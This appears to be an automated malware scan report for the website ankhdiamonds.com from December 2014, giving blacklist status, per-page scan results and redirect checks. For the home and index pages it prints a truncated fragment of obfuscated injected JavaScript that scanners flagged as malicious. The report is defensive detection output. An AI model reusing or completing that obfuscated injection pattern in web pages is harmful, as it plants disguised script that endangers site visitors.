Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ankhdiamonds.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ankhdiamonds.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ankhdiamonds.com/ | 200 OK Content-Length: 25900 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ugvfbs="vlJmUSgOoI@p%RrtturwmJmJmtpJRQ";urfww="t3cscrt69pt74t20t6cant67uat67t65t3dt6at61vascrit70t74t3et20 t66unct74iot6e kt67t6c(gt65t6fyt74t63)t7bvar t75gt74,oowt6b=\"t3bt20t6f~d5^t78,t56t31t73t55t42t6bNct7apt34[}2PeMIt5at28t2bivt37t48t39t46t61_t24t77t41t26t2aO\\t22rt6a'6t21t23gt30t74t38=3bt75G.Kt43l`t5dq:t45|t2dnmJt66t7bt40t79Tt68)t22,rt77t3d\"\",dakt2cmct63pt2ct6bvt66t62ft3dt22\"t2ct6cmt78t3bt66t6ft72(t75t67t74t3d0;ugt74t3ct67t65ot79t74c.lengt74h;ut67t74t2bt2b){ t64t61k=gt65t6fyt74t63.cht61r Antivirus reports:
| ||
http://ankhdiamonds.com/css-js/functions_all.js | 200 OK Content-Length: 9393 Content-Type: application/javascript | clean |
http://ankhdiamonds.com/mm_menu.js | 200 OK Content-Length: 29976 Content-Type: application/javascript | clean |
http://ankhdiamonds.com/lower.php?fid=1 | 200 OK Content-Length: 141 Content-Type: text/html | clean |
http://ankhdiamonds.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://ankhdiamonds.com/lower.php?fid=3 | 200 OK Content-Length: 141 Content-Type: text/html | clean |
http://ankhdiamonds.com/login.php | 200 OK Content-Length: 18381 Content-Type: text/html | clean |
http://ankhdiamonds.com/index.php | 200 OK Content-Length: 25900 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ugvfbs="vlJmUSgOoI@p%RrtturwmJmJmtpJRQ";urfww="t3cscrt69pt74t20t6cant67uat67t65t3dt6at61vascrit70t74t3et20 t66unct74iot6e kt67t6c(gt65t6fyt74t63)t7bvar t75gt74,oowt6b=\"t3bt20t6f~d5^t78,t56t31t73t55t42t6bNct7apt34[}2PeMIt5at28t2bivt37t48t39t46t61_t24t77t41t26t2aO\\t22rt6a'6t21t23gt30t74t38=3bt75G.Kt43l`t5dq:t45|t2dnmJt66t7bt40t79Tt68)t22,rt77t3d\"\",dakt2cmct63pt2ct6bvt66t62ft3dt22\"t2ct6cmt78t3bt66t6ft72(t75t67t74t3d0;ugt74t3ct67t65ot79t74c.lengt74h;ut67t74t2bt2b){ t64t61k=gt65t6fyt74t63.cht61r Antivirus reports:
| ||
http://ankhdiamonds.com/shopcart.php | 200 OK Content-Length: 17791 Content-Type: text/html | clean |
http://ankhdiamonds.com/orderview.php | 200 OK Content-Length: 17239 Content-Type: text/html | clean |
http://ankhdiamonds.com/../css-js/functions_all.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://ankhdiamonds.com/typesearch.php?txt_searchstring=2&txt_from=2 | 200 OK Content-Length: 32986 Content-Type: text/html | clean |
http://ankhdiamonds.com/typesearch.php?txt_searchstring=1&txt_from=2 | 200 OK Content-Length: 32986 Content-Type: text/html | clean |
http://ankhdiamonds.com/typesearch.php?txt_searchstring=3&txt_from=2 | 200 OK Content-Length: 32986 Content-Type: text/html | clean |
http://ankhdiamonds.com/typesearch.php?txt_searchstring=4&txt_from=2 | 200 OK Content-Length: 32986 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ankhdiamonds.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 13 Dec 2014 21:44:08 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=673c7bbb3f20584269dc1ceb6f9d6ca6; path=/
X-Powered-By: PHP/5.4.31
GET / HTTP/1.1
Host: ankhdiamonds.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 13 Dec 2014 21:44:08 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=673c7bbb3f20584269dc1ceb6f9d6ca6; path=/
X-Powered-By: PHP/5.4.31
Second query (visit from search engine):
GET / HTTP/1.1
Host: ankhdiamonds.com
Referer: http://www.google.com/search?q=ankhdiamonds.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ankhdiamonds.com
Referer: http://www.google.com/search?q=ankhdiamonds.com
Result:
The result is similar to the first query. There are no suspicious redirects found.